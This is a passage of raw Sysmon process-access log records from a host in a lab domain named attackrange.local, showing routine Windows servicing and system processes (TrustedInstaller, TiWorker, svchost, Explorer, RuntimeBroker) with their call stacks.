2\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.805{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+
244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.805{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.789{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.789{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.789{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.789{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCR
T4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.789{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.789{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.789{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.773{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.773{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.773{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.758{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.758{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.742{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.742{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.742{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
